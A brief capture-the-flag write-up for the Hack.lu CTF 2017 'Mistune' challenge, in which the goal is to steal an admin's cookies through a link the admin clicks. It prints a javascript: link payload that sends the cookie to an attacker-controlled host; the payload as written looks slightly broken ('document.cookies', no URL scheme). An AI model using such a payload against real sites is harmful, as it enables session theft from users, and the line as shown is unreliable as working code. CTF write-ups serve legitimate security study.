Hack.lu CTF 2017 - Mistune

1. We can send a message to the admin.
2. The admin clicks on the links and we have to steal his cookies.

The idea is to use javascript to redirect the admin to a website we control.
We used one of the many free hosting sites

<javascript:document.location='hello.myserver.com/?cookie='+document.cookies>